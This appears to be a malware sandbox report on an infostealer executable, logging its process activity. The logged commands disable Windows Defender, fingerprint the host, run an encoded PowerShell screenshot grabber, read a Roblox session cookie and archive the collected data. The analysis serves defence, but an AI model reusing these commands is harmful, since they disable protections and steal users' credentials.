Source: wsapx.exe	String found in binary or memory: set-addPolicy
Source: wsapx.exe	String found in binary or memory: when smaller code objects and pyc files are desired as well as suppressing the extra visual location indicators when the interpreter displays tracebacks. These variables have equivalent command-line parameters (see --help for details): PYTHONDEBUG
Source: wsapx.exe	String found in binary or memory: when smaller code objects and pyc files are desired as well as suppressing the extra visual location indicators when the interpreter displays tracebacks. These variables have equivalent command-line parameters (see --help for details): PYTHONDEBUG
Source: wsapx.exe	String found in binary or memory: can't send non-None value to a just-started coroutine
Source: wsapx.exe	String found in binary or memory: can't send non-None value to a just-started generator
Source: wsapx.exe	String found in binary or memory: can't send non-None value to a just-started async generator
Source: wsapx.exe	String found in binary or memory: --help
Source: wsapx.exe	String found in binary or memory: --help

Source: C:\Users\user\Desktop\wsapx.exe

File read: C:\Users\user\Desktop\wsapx.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\wsapx.exe "C:\Users\user\Desktop\wsapx.exe"
Source: C:\Users\user\Desktop\wsapx.exe	Process created: C:\Users\user\Desktop\wsapx.exe "C:\Users\user\Desktop\wsapx.exe"
Source: C:\Users\user\Desktop\wsapx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\wsapx.exe'"
Source: C:\Users\user\Desktop\wsapx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\wsapx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Verify your permissions and try again.', 0, 'Access Denied', 48+16);close()""
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\wsapx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\wsapx.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Verify your permissions and try again.', 0, 'Access Denied', 48+16);close()"
Source: C:\Users\user\Desktop\wsapx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
Source: C:\Users\user\Desktop\wsapx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
Source: C:\Users\user\Desktop\wsapx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
Source: C:\Users\user\Desktop\wsapx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Users\user\Desktop\wsapx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Users\user\Desktop\wsapx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ??.scr'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ??.scr'
Source: C:\Users\user\Desktop\wsapx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Users\user\Desktop\wsapx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\wsapx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
Source: C:\Users\user\Desktop\wsapx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
Source: C:\Users\user\Desktop\wsapx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\wsapx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Users\user\Desktop\wsapx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
Source: C:\Users\user\Desktop\wsapx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"
Source: C:\Users\user\Desktop\wsapx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\wsapx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIA
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
Source: C:\Users\user\Desktop\wsapx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Users\user\Desktop\wsapx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uses4c50\uses4c50.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES226F.tmp" "c:\Users\user\AppData\Local\Temp\uses4c50\CSCF61F15A833E5414089F1F2D7C06D86CA.TMP"
Source: C:\Users\user\Desktop\wsapx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"
Source: C:\Users\user\Desktop\wsapx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Users\user\Desktop\wsapx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\getmac.exe getmac
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\wsapx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Users\user\Desktop\wsapx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Users\user\Desktop\wsapx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Users\user\Desktop\wsapx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Users\user\Desktop\wsapx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe a -r -hp"Logger1@12345" "C:\Users\user\AppData\Local\Temp\bALb7.zip" *"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe a -r -hp"Logger1@12345" "C:\Users\user\AppData\Local\Temp\bALb7.zip" *
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\wsapx.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\wsapx.exe	Process created: C:\Users\user\Desktop\wsapx.exe "C:\Users\user\Desktop\wsapx.exe"	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\wsapx.exe'"	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Verify your permissions and try again.', 0, 'Access Denied', 48+16);close()""	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"	Jump to behavior
